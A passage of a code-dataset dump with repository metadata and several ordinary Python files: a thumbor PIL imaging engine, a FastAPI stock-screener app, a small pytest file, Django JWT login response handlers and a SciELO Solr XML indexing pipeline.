] | guoligit@gmail.com |
8202094a23d76e36f8d0a8c3817a8c188a349efa | 318013ccb8738ace0ec72965dac0a3e3fe2fecad | /venv/lib/python3.7/site-packages/thumbor/engines/pil.py | 74b45e391dd24609f25b3067ab5ceab52c495cf8 | [] | no_license | nahyunkwon/Processing-3DImages | 792deafbd1a607af8cae439b5d7ab81f772f6653 | bde217aad08dd911ae8125edeae42f7b674614f2 | refs/heads/master | 2023-01-02T10:29:41.325974 | 2020-11-01T19:02:19 | 2020-11-01T19:02:19 | 299,133,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,327 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
from __future__ import absolute_import
import os
from tempfile import mkstemp
from subprocess import Popen, PIPE
from io import BytesIO
from PIL import Image, ImageFile, ImageDraw, ImageSequence, JpegImagePlugin, ImageFilter
from thumbor.engines import BaseEngine
from thumbor.engines.extensions.pil import GifWriter
from thumbor.utils import logger, deprecated
try:
from thumbor.ext.filters import _composite
FILTERS_AVAILABLE = True
except ImportError:
FILTERS_AVAILABLE = False
FORMATS = {
'.tif': 'PNG', # serve tif as png
'.jpg': 'JPEG',
'.jpeg': 'JPEG',
'.gif': 'GIF',
'.png': 'PNG',
'.webp': 'WEBP'
}
ImageFile.MAXBLOCK = 2 ** 25
ImageFile.LOAD_TRUNCATED_IMAGES = True
DecompressionBombExceptions = (Image.DecompressionBombWarning,)
if hasattr(Image, 'DecompressionBombError'):
DecompressionBombExceptions += (Image.DecompressionBombError,)
class Engine(BaseEngine):
def __init__(self, context):
super(Engine, self).__init__(context)
self.subsampling = None
self.qtables = None
self.original_mode = None
try:
if self.context.config.MAX_PIXELS is None or int(self.context.config.MAX_PIXELS):
Image.MAX_IMAGE_PIXELS = self.context.config.MAX_PIXELS
except (AttributeError, TypeError, ValueError): # invalid type
logger.info('MAX_PIXELS config variable set to invalid type. Has to be int on None')
def gen_image(self, size, color):
if color == 'transparent':
color = None
img = Image.new("RGBA", size, color)
return img
def create_image(self, buffer):
try:
img = Image.open(BytesIO(buffer))
except DecompressionBombExceptions as e:
logger.warning("[PILEngine] create_image failed: {0}".format(e))
return None
self.icc_profile = img.info.get('icc_profile')
self.exif = img.info.get('exif')
self.original_mode = img.mode
self.subsampling = JpegImagePlugin.get_sampling(img)
if (self.subsampling == -1): # n/a for this file
self.subsampling = None
self.qtables = getattr(img, 'quantization', None)
if self.context.config.ALLOW_ANIMATED_GIFS and self.extension == '.gif':
frames = []
for frame in ImageSequence.Iterator(img):
frames.append(frame.convert('P'))
img.seek(0)
self.frame_count = len(frames)
return frames
return img
def get_resize_filter(self):
config = self.context.config
resample = config.PILLOW_RESAMPLING_FILTER if config.PILLOW_RESAMPLING_FILTER is not None else 'LANCZOS'
available = {
'LANCZOS': Image.LANCZOS,
'NEAREST': Image.NEAREST,
'BILINEAR': Image.BILINEAR,
'BICUBIC': Image.BICUBIC,
}
if hasattr(Image, 'HAMMING'):
available['HAMMING'] = Image.HAMMING
return available.get(resample.upper(), Image.LANCZOS)
def draw_rectangle(self, x, y, width, height):
# Nasty retry if the image is loaded for the first time and it's truncated
try:
d = ImageDraw.Draw(self.image)
except IOError:
d = ImageDraw.Draw(self.image)
d.rectangle([x, y, x + width, y + height])
del d
def resize(self, width, height):
# Indexed color modes (such as 1 and P) will be forced to use a
# nearest neighbor resampling algorithm. So we convert them to
# RGB(A) mode before resizing to avoid nasty scaling artifacts.
if self.image.mode in ['1', 'P']:
logger.debug('converting image from 8-bit/1-bit palette to 32-bit RGB(A) for resize')
if self.image.mode == '1':
target_mode = 'RGB'
else:
# convert() figures out RGB or RGBA based on palette used
target_mode = None
self.image = self.image.convert(mode=target_mode)
size = (int(width), int(height))
# Tell image loader what target size we want (only JPG for a moment)
self.image.draft(None, size)
resample = self.get_resize_filter()
self.image = self.image.resize(size, resample)
def crop(self, left, top, right, bottom):
self.image = self.image.crop((
int(left),
int(top),
int(right),
int(bottom)
))
def rotate(self, degrees):
# PIL rotates counter clockwise
if degrees == 90:
self.image = self.image.transpose(Image.ROTATE_90)
elif degrees == 180:
self.image = self.image.transpose(Image.ROTATE_180)
elif degrees == 270:
self.image = self.image.transpose(Image.ROTATE_270)
else:
self.image = self.image.rotate(degrees, expand=1)
def flip_vertically(self):
self.image = self.image.transpose(Image.FLIP_TOP_BOTTOM)
def flip_horizontally(self):
self.image = self.image.transpose(Image.FLIP_LEFT_RIGHT)
def get_default_extension(self):
# extension is not present => force JPEG or PNG
if self.image.mode in ['P', 'RGBA', 'LA']:
return '.png'
else:
return '.jpeg'
def read(self, extension=None, quality=None): # NOQA
# returns image buffer in byte format.
img_buffer = BytesIO()
requested_extension = extension or self.extension
# 1 and P mode images will be much smaller if converted back to
# their original mode. So let's do that after resizing. Get $$.
if self.context.config.PILLOW_PRESERVE_INDEXED_MODE and requested_extension in [None, '.png', '.gif'] \
and self.original_mode in ['P', '1'] and self.original_mode != self.image.mode:
if self.original_mode == '1':
self.image = self.image.convert('1')
else:
# libimagequant might not be enabled on compile time
# but it's better than default octree for RGBA images, so worth a try
quantize_default = True
try:
# Option available since Pillow 3.3.0
if hasattr(Image, 'LIBIMAGEQUANT'):
self.image = self.image.quantize(method=Image.LIBIMAGEQUANT)
quantize_default = False
except ValueError as ex:
if 'dependency' not in str(ex).lower():
raise
if quantize_default:
self.image = self.image.quantize()
ext = requested_extension or self.get_default_extension()
options = {
'quality': quality
}
if ext == '.jpg' or ext == '.jpeg':
options['optimize'] = True
if self.context.config.PROGRESSIVE_JPEG:
# Can't simply set options['progressive'] to the value
# of self.context.config.PROGRESSIVE_JPEG because save
# operates on the presence of the key in **options, not
# the value of that setting.
options['progressive'] = True
if self.image.mode != 'RGB':
self.image = self.image.convert('RGB')
else:
subsampling_config = self.context.config.PILLOW_JPEG_SUBSAMPLING
qtables_config = self.context.config.PILLOW_JPEG_QTABLES
if subsampling_config is not None or qtables_config is not None:
options['quality'] = 0 # can't use 'keep' here as Pillow would try to extract qtables/subsampling and fail
orig_subsampling = self.subsampling
orig_qtables = self.qtables
if (subsampling_config == 'keep' or subsampling_config is None) and (orig_subsampling is not None):
options['subsampling'] = orig_subsampling
else:
options['subsampling'] = subsampling_config
if (qtables_config == 'keep' or qtables_config is None) and (orig_qtables and 2 <= len(orig_qtables) <= 4):
options['qtables'] = orig_qtables
else:
options['qtables'] = qtables_config
if ext == '.png' and self.context.config.PNG_COMPRESSION_LEVEL is not None:
options['compress_level'] = self.context.config.PNG_COMPRESSION_LEVEL
if options['quality'] is None:
options['quality'] = self.context.config.QUALITY
if self.icc_profile is not None:
options['icc_profile'] = self.icc_profile
if self.context.config.PRESERVE_EXIF_INFO:
if self.exif is not None:
options['exif'] = self.exif
try:
if ext == '.webp':
if options['quality'] == 100:
logger.debug("webp quality is 100, using lossless instead")
options['lossless'] = True
options.pop('quality')
if self.image.mode not in ['RGB', 'RGBA']:
if self.image.mode == 'P':
mode = 'RGBA'
else:
mode = 'RGBA' if self.image.mode[-1] == 'A' else 'RGB'
self.image = self.image.convert(mode)
if ext in ['.png', '.gif'] and self.image.mode == 'CMYK':
self.image = self.image.convert('RGBA')
self.image.format = FORMATS.get(ext, FORMATS[self.get_default_extension()])
self.image.save(img_buffer, self.image.format, **options)
except IOError:
logger.exception('Could not save as improved image, consider to increase ImageFile.MAXBLOCK')
self.image.save(img_buffer, FORMATS[ext])
results = img_buffer.getvalue()
img_buffer.close()
self.extension = ext
return results
def read_multiple(self, images, extension=None):
gif_writer = GifWriter()
img_buffer = BytesIO()
duration = []
converted_images = []
xy = []
dispose = []
for im in images:
duration.append(float(im.info.get('duration', 80)) / 1000)
converted_images.append(im.convert("RGB"))
xy.append((0, 0))
dispose.append(1)
loop = int(self.image.info.get('loop', 1))
images = gif_writer.convertImagesToPIL(converted_images, False, None)
gif_writer.writeGifToFile(img_buffer, images, duration, loop, xy, dispose)
results = img_buffer.getvalue()
img_buffer.close()
tmp_fd, tmp_file_path = mkstemp()
f = os.fdopen(tmp_fd, "w")
f.write(results)
f.close()
command = [
'gifsicle',
'--colors',
'256',
tmp_file_path
]
popen = Popen(command, stdout=PIPE)
pipe = popen.stdout
pipe_output = pipe.read()
pipe.close()
if popen.wait() == 0:
results = pipe_output
os.remove(tmp_file_path)
return results
@deprecated("Use image_data_as_rgb instead.")
def get_image_data(self):
return self.image.tobytes()
def set_image_data(self, data):
self.image.frombytes(data)
@deprecated("Use image_data_as_rgb instead.")
def get_image_mode(self):
return self.image.mode
def image_data_as_rgb(self, update_image=True):
converted_image = self.image
if converted_image.mode not in ['RGB', 'RGBA']:
if 'A' in converted_image.mode:
converted_image = converted_image.convert('RGBA')
elif converted_image.mode == 'P':
# convert() figures out RGB or RGBA based on palette used
converted_image = converted_image.convert(None)
else:
converted_image = converted_image.convert('RGB')
if update_image:
self.image = converted_image
return converted_image.mode, converted_image.tobytes()
def convert_to_grayscale(self, update_image=True, with_alpha=True):
if 'A' in self.image.mode and with_alpha:
image = self.image.convert('LA')
else:
image = self.image.convert('L')
if update_image:
self.image = image
return image
def has_transparency(self):
has_transparency = 'A' in self.image.mode or 'transparency' in self.image.info
if has_transparency:
# If the image has alpha channel,
# we check for any pixels that are not opaque (255)
has_transparency = min(self.image.convert('RGBA').getchannel('A').getextrema()) < 255
return has_transparency
def paste(self, other_engine, pos, merge=True):
if merge and not FILTERS_AVAILABLE:
raise RuntimeError(
'You need filters enabled to use paste with merge. Please reinstall ' +
'thumbor with proper compilation of its filters.')
self.enable_alpha()
other_engine.enable_alpha()
image = self.image
other_image = other_engine.image
if merge:
sz = self.size
other_size = other_engine.size
mode, data = self.image_data_as_rgb()
other_mode, other_data = other_engine.image_data_as_rgb()
imgdata = _composite.apply(
mode, data, sz[0], sz[1],
other_data, other_size[0], other_size[1], pos[0], pos[1])
self.set_image_data(imgdata)
else:
image.paste(other_image, pos)
def enable_alpha(self):
if self.image.mode != 'RGBA':
self.image = self.image.convert('RGBA')
def strip_icc(self):
self.icc_profile = None
def strip_exif(self):
self.exif = None
def blur(self, radius):
self.image = self.image.filter(ImageFilter.GaussianBlur(radius))
| [
"skgus2624@gmail.com"
] | skgus2624@gmail.com |
ebb61313229105bb7b4920c03da8492cdfb76579 | 2adf2ddb53b6e132f98454f268a876c1bbd5aafe | /main.py | d6a3ca6df3fd97dc3992ede09475d727e1ecc945 | [] | no_license | francoislegac/stockscreen_api | 9b296c81b85c09877d789d502dfa93ab79797466 | 33cc8410f82b3e6b33864eb1a8fa381836defefd | refs/heads/main | 2023-08-16T15:09:22.464594 | 2021-10-01T21:24:28 | 2021-10-01T21:24:28 | 412,618,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,701 | py | import models
import yfinance
from fastapi import FastAPI, Request, Depends, BackgroundTasks
from fastapi.templating import Jinja2Templates
from sqlalchemy.orm import Session
from database import SessionLocal, engine
from pydantic import BaseModel
from models import Stock
app = FastAPI()
models.Base.metadata.create_all(bind=engine)
#where are the html templates
templates = Jinja2Templates(directory= 'templates')
class StockRequest(BaseModel):
symbol: str
def get_db():
try:
db = SessionLocal()
yield db
finally:
db.close()
@app.get('/')
def home(request: Request):
"""
displays the stock screener dashboard / homepage
"""
return templates.TemplateResponse('home.html',
{'request':request,
}
)
#get the data from finance mag
def fetch_stock_data(id: int):
db = SessionLocal()
stock = db.query(Stock).filter(Stock.id == id).first()
yahoo_data = yfinance.Ticker(stock.symbol)
stock.ma200 = yahoo_data.info['twoHundredDayAverage']
stock.ma50 = yahoo_data.info['fiftyDayAverage']
stock.price = yahoo_data.info['previousClose']
stock.forward_pe = yahoo_data.info['forwardPE']
stock.forward_eps = yahoo_data.info['forwardEps']
if yahoo_data.info['dividendYield'] is not None:
stock.dividend_yield = yahoo_data.info['dividendYield'] * 100
db.add(stock)
db.commit()
@app.post('/stock')
async def create_stock(stock_request: StockRequest, background_tasks: BackgroundTasks, db: Session = Depends(get_db)):
"""
create a stock and stores it into the database
"""
stock = Stock()
stock.symbol = stock_request.symbol
db.add(stock)
db.commit()
background_tasks.add_task(fetch_stock_data, stock.id)
return {
'code':'success',
'message':'stock created'
} | [
"francois.legac59@gmail.com"
] | francois.legac59@gmail.com |
da2627d7cd45f5e9f9e893251f0842877f0ea20f | a1de4ef95569bf74190c16063049c63365926cea | /backend/tests/test_run_adapters.py | 832e83285bed9f5d9d29c198df64db04ed5f00c2 | [] | no_license | jigsawlabs-student/hotels_project | e1c773a6cc263c3b7cdcf141829627a2352c2144 | ed30521941bc0a95b8f139b3efd942ed18c0a6d6 | refs/heads/main | 2023-03-04T13:15:35.878281 | 2021-02-19T21:24:06 | 2021-02-19T21:24:06 | 340,493,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | import os
import pytest
from run_adapters import hotel_ids_str
# Production Test - Tests the CSV of hotels to call from the API is properly opened and the Amadeus ID's are converted to a string to prepare for API call
# If add more hotels than Aman, update the hotel_ids str below:
hotel_ids = 'AMATHAAZ,AMBJVARU,AMCMBAAW,AMCMBAMA,AMCVFAAL,AMDPSAKA,AMDPSAMI,AMHGHAFA,AMHKTAMP,AMJACAMG,AMJAIAAK,AMJAIAMA,AMJOGABA,AMLJGAMA,AMLPQAAT,AMMNLAMP,AMNGOAMA,AMNHAAOI,AMPEKASP,AMPGAAGI,AMPLSAAY,AMPOPAME,AMQBAAAS,AMRAKTAH,AMREPASA,AMSHAAMN,AMSWQAWA,AMTYOATK,AMVCECGV,AMDPSASN,AMUKYANK'
def test_hotel_ids_prod():
hotel_id_str = hotel_ids_str()
assert hotel_id_str == hotel_ids
### NEEDS TO BE FIXED WITH OS.PATH.JOIN | [
"cwaskom@gmail.com"
] | cwaskom@gmail.com |
2542635ffe3127c2fbac935e327705fd7fcb674b | cc7bbdbb22cb6f7e7916388a5ee8218bc8ffa158 | /Python3/Tornado/apps/pg/PG_Client/clientadmin/utils.py | 971af7cb5a0d2998e2e927d20769b4a5cd027213 | [
"MIT"
] | permissive | youngqqcn/QBlockChainNotes | a816e067642f48a6da38b624663254b4016ec496 | c9c143eaba6c06e3cee866669ec286e4d3cdbba8 | refs/heads/master | 2023-04-03T23:31:05.585545 | 2023-03-30T09:29:07 | 2023-03-30T09:29:07 | 155,657,459 | 37 | 15 | MIT | 2023-03-06T23:09:32 | 2018-11-01T03:33:11 | JavaScript | UTF-8 | Python | false | false | 1,574 | py |
def jwt_response_payload_handler(token, user=None, request=None):
"""
自定义jwt认证成功返回数据
:token 返回的jwt
:user 当前登录的用户信息[对象]
:request 当前本次客户端提交过来的数据
"""
if user.username != None:
return {
'code': "fail",
"status": 200,
"data": {
"gcode" : user.username,
"detail": "请输入验证码,重新登录!",
}
}
return {
'code': "success",
"status": 200,
"data": {
'token': token,
'pro_id': user.pro_id,
'username': user.pro_name,
'email': user.email,
'tel_no': user.tel_no,
"detail": "登录成功!",
}
}
def jwt_response_payload_error_handler(request = None):
return {
"code": "fail",
"status": 400,
"data": {
"detail": "登录失败! 请检查账号信息是否正确,重新登录! ",
}
}
def jwt_response_payload_code_error_handler(request = None):
return {
"code": "fail",
"status": 400,
"data": {
"detail": "登录失败! 请检查谷歌验证码是否正确,重新登录! ",
}
}
def jwt_response_payload_frequently_error_handler(request = None):
return {
"code": "fail",
"status": 400,
"data": {
"detail": "登录失败! 登录频繁! ",
}
}
| [
"youngqqcn@163.com"
] | youngqqcn@163.com |
964d0631249c05ccd8a57becf125da4429dca45e | 3dfbd430ef10352acd4a4cfbeb51c01e78ad0dd1 | /updatesearch/pipeline_xml.py | 20b05fae0c8e62b7e8d8a4d81c2730aedf8e3432 | [
"BSD-2-Clause"
] | permissive | DalavanCloud/search-journals-proc | f09c7e29ede35e6756ccee5f20fabec9c1676224 | a246688ffd213c6ff814c290ea2190f7de358def | refs/heads/master | 2020-04-29T06:44:04.593174 | 2017-11-09T19:30:37 | 2017-11-09T19:30:37 | 175,927,206 | 1 | 0 | null | 2019-03-16T04:44:47 | 2019-03-16T04:44:47 | null | UTF-8 | Python | false | false | 19,924 | py | # coding: utf-8
from lxml import etree as ET
import plumber
from citedby import client
CITEDBY = client.ThriftClient(domain='citedby.scielo.org:11610')
"""
Full example output of this pipeline:
<doc>
<field name="id">art-S0102-695X2015000100053-scl</field>
<field name="journal_title">Revista Ambiente & Água</field>
<field name="in">scl</field>
<field name="ac">Agricultural Sciences</field>
<field name="type">editorial</field>
<field name="ur">art-S1980-993X2015000200234</field>
<field name="authors">Marcelo dos Santos, Targa</field>
<field name="orcidid">orcidid</field>
<field name="lattesid">lattesid</field>
<field name="ti_*">Benefits and legacy of the water crisis in Brazil</field>
<field name="pg">234-239</field>
<field name="doi">10.1590/S0102-67202014000200011</field>
<field name="wok_citation_index">SCIE</field>
<field name="volume">48</field>
<field name="supplement_volume">48</field>
<field name="issue">7</field>
<field name="supplement_issue">suppl. 2</field>
<field name="start_page">216</field>
<field name="end_page">218</field>
<field name="ta">Rev. Ambient. Água</field>
<field name="la">en</field>
<field name="fulltext_pdf_pt">http://www.scielo.br/pdf/ambiagua/v10n2/1980-993X-ambiagua-10-02-00234.pdf</field>
<field name="fulltext_pdf_pt">http://www.scielo.br/scielo.php?script=sci_abstract&pid=S0102-67202014000200138&lng=en&nrm=iso&tlng=pt</field>
<field name="da">2015-06</field>
<field name="ab_*">In this editorial, we reflect on the benefits and legacy of the water crisis....</field>
<field name="aff_country">Brasil</field>
<field name="aff_institution">usp</field>
<field name="sponsor">CNPQ</field>
</doc>
"""
CITABLE_DOCUMENT_TYPES = (
u'article-commentary',
u'brief-report',
u'case-report',
u'rapid-communication',
u'research-article',
u'review-article'
)
class SetupDocument(plumber.Pipe):
def transform(self, data):
xml = ET.Element('doc')
return data, xml
class SubjectAreas(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.journal.subject_areas:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
if len(raw.journal.subject_areas) > 2:
field = ET.Element('field')
field.text = 'multidisciplinary'
field.set('name', 'subject_area')
xml.find('.').append(field)
return data
for subject_area in raw.journal.subject_areas:
field = ET.Element('field')
field.text = subject_area
field.set('name', 'subject_area')
xml.find('.').append(field)
return data
class Keywords(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.keywords():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
for language, keywords in raw.keywords().items():
for keyword in keywords:
field = ET.Element('field')
field.text = keyword
field.set('name', 'keyword_%s' % language)
xml.find('.').append(field)
return data
class IsCitable(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = 'is_true' if raw.document_type in CITABLE_DOCUMENT_TYPES else 'is_false'
field.set('name', 'is_citable')
xml.find('.').append(field)
return data
class JournalISSNs(plumber.Pipe):
def transform(self, data):
raw, xml = data
issns = set()
if raw.electronic_issn:
issns.add(raw.journal.electronic_issn)
if raw.print_issn:
issns.add(raw.journal.print_issn)
issns.add(raw.journal.scielo_issn)
for issn in issns:
field = ET.Element('field')
field.text = issn
field.set('name', 'issn')
xml.find('.').append(field)
return data
class DocumentID(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = '{0}-{1}'.format(raw.publisher_id, raw.collection_acronym)
field.set('name', 'id')
xml.find('.').append(field)
return data
class JournalTitle(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.journal.title
field.set('name', 'journal_title')
xml.find('.').append(field)
return data
class JournalTitle(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.journal.title
field.set('name', 'journal_title')
xml.find('.').append(field)
return data
class Permission(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.permissions:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.permissions.get('id', '')
field.set('name', 'use_license')
xml.append(field)
if raw.permissions.get('text', None):
field = ET.Element('field')
field.text = raw.permissions.get('text', '')
field.set('name', 'use_license_text')
xml.append(field)
if raw.permissions.get('url', None):
field = ET.Element('field')
field.text = raw.permissions.get('url', '')
field.set('name', 'use_license_uri')
xml.append(field)
return data
class Collection(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.collection_acronym
field.set('name', 'in')
xml.find('.').append(field)
return data
class DocumentType(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.document_type
field.set('name', 'type')
xml.find('.').append(field)
return data
class URL(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = '{0}'.format(raw.publisher_id)
field.set('name', 'ur')
xml.find('.').append(field)
return data
class Authors(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.authors:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
for author in raw.authors:
field = ET.Element('field')
name = []
if 'surname' in author:
name.append(author['surname'])
if 'given_names' in author:
name.append(author['given_names'])
field.text = ', '.join(name)
field.set('name', 'au')
xml.find('.').append(field)
return data
class Orcid(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.authors:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
for orcid in [i['orcid'] for i in raw.authors if i.get('orcid', None)]:
field = ET.Element('field')
field.text = orcid
field.set('name', 'orcid')
xml.find('.').append(field)
return data
class OriginalTitle(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.original_title():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.original_title()
field.set('name', 'ti')
xml.find('.').append(field)
return data
class Titles(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.original_title() and not raw.translated_titles():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.original_title()
field.set('name', 'ti_%s' % raw.original_language())
xml.find('.').append(field)
if not raw.translated_titles():
return data
for language, title in raw.translated_titles().items():
field = ET.Element('field')
field.text = title
field.set('name', 'ti_%s' % language)
xml.find('.').append(field)
return data
class Pages(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.start_page and not raw.end_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
pages = []
if raw.start_page:
pages.append(raw.start_page)
if raw.end_page:
pages.append(raw.end_page)
field = ET.Element('field')
field.text = '-'.join(pages)
field.set('name', 'pg')
xml.find('.').append(field)
return data
class DOI(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.doi:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.doi
field.set('name', 'doi')
xml.find('.').append(field)
return data
class WOKCI(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.journal.wos_citation_indexes:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
for index in raw.journal.wos_citation_indexes:
field = ET.Element('field')
field.text = index.replace('&', '')
field.set('name', 'wok_citation_index')
xml.find('.').append(field)
return data
class WOKSC(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.journal.wos_subject_areas:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
for index in raw.journal.wos_subject_areas:
field = ET.Element('field')
field.text = index
field.set('name', 'wok_subject_categories')
xml.find('.').append(field)
return data
class Volume(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.issue.volume:
field = ET.Element('field')
field.text = raw.issue.volume
field.set('name', 'volume')
xml.find('.').append(field)
return data
class SupplementVolume(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.issue.supplement_volume:
field = ET.Element('field')
field.text = raw.issue.supplement_volume
field.set('name', 'supplement_volume')
xml.find('.').append(field)
return data
class Issue(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.issue.number:
field = ET.Element('field')
field.text = raw.issue.number
field.set('name', 'issue')
xml.find('.').append(field)
return data
class SupplementIssue(plumber.Pipe):
def transform(self, data):
raw, xml = data
if raw.issue.supplement_number:
field = ET.Element('field')
field.text = raw.issue.supplement_number
field.set('name', 'supplement_issue')
xml.find('.').append(field)
return data
class ElocationPage(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.elocation:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.elocation
field.set('name', 'elocation')
xml.find('.').append(field)
return data
class StartPage(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.start_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.start_page
field.set('name', 'start_page')
xml.find('.').append(field)
return data
class EndPage(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.end_page:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.end_page
field.set('name', 'end_page')
xml.find('.').append(field)
return data
class JournalAbbrevTitle(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.journal.abbreviated_title
field.set('name', 'ta')
xml.find('.').append(field)
return data
class Languages(plumber.Pipe):
def transform(self, data):
raw, xml = data
langs = set([i for i in raw.languages()])
langs.add(raw.original_language())
for language in langs:
field = ET.Element('field')
field.text = language
field.set('name', 'la')
xml.find('.').append(field)
return data
class AvailableLanguages(plumber.Pipe):
def transform(self, data):
raw, xml = data
langs = set([i for i in raw.languages()])
langs.add(raw.original_language())
if raw.translated_abstracts():
for lang in raw.translated_abstracts().keys():
langs.add(lang)
for language in langs:
field = ET.Element('field')
field.text = language
field.set('name', 'available_languages')
xml.find('.').append(field)
return data
class Fulltexts(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.fulltexts():
raise plumber.UnmetPrecondition()
def transform(self, data):
raw, xml = data
ft = raw.fulltexts()
# There is articles that does not have pdf
if 'pdf' in ft:
for language, url in ft['pdf'].items():
field = ET.Element('field')
field.text = url
field.set('name', 'fulltext_pdf_%s' % language)
xml.find('.').append(field)
if 'html' in ft:
for language, url in ft['html'].items():
field = ET.Element('field')
field.text = url
field.set('name', 'fulltext_html_%s' % language)
xml.find('.').append(field)
return data
class PublicationDate(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.publication_date
field.set('name', 'da')
xml.find('.').append(field)
return data
class SciELOPublicationDate(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.creation_date
field.set('name', 'scielo_publication_date')
xml.find('.').append(field)
return data
class ReceivedCitations(plumber.Pipe):
def transform(self, data):
raw, xml = data
result = CITEDBY.citedby_pid(raw.publisher_id, metaonly=True)
field = ET.Element('field')
field.text = str(result.get('article', {'total_received': 0})['total_received'])
field.set('name', 'total_received')
xml.find('.').append(field)
return data
class SciELOProcessingDate(plumber.Pipe):
def transform(self, data):
raw, xml = data
field = ET.Element('field')
field.text = raw.processing_date
field.set('name', 'scielo_processing_date')
xml.find('.').append(field)
return data
class Abstract(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.original_abstract() and not raw.translated_abstracts():
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
if raw.original_abstract():
field = ET.Element('field')
field.text = raw.original_abstract()
field.set('name', 'ab_%s' % raw.original_language())
xml.find('.').append(field)
if not raw.translated_abstracts():
return data
for language, abstract in raw.translated_abstracts().items():
field = ET.Element('field')
field.text = abstract
field.set('name', 'ab_%s' % language)
xml.find('.').append(field)
return data
class AffiliationCountry(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.mixed_affiliations:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
countries = set()
for affiliation in raw.mixed_affiliations:
if 'country' in affiliation:
countries.add(affiliation['country'])
for country in countries:
field = ET.Element('field')
field.text = country.strip()
field.set('name', 'aff_country')
xml.find('.').append(field)
return data
class AffiliationInstitution(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.mixed_affiliations:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
institutions = set()
for affiliation in raw.mixed_affiliations:
if 'institution' in affiliation:
institutions.add(affiliation['institution'])
for institution in institutions:
field = ET.Element('field')
field.text = institution.strip()
field.set('name', 'aff_institution')
xml.find('.').append(field)
return data
class Sponsor(plumber.Pipe):
def precond(data):
raw, xml = data
if not raw.project_sponsor:
raise plumber.UnmetPrecondition()
@plumber.precondition(precond)
def transform(self, data):
raw, xml = data
sponsors = set()
for sponsor in raw.project_sponsor:
if 'orgname' in sponsor:
sponsors.add(sponsor['orgname'])
for sponsor in sponsors:
field = ET.Element('field')
field.text = sponsor
field.set('name', 'sponsor')
xml.find('.').append(field)
return data
class TearDown(plumber.Pipe):
def transform(self, data):
raw, xml = data
return xml
| [
"fabiobatalha@gmail.com"
] | fabiobatalha@gmail.com |
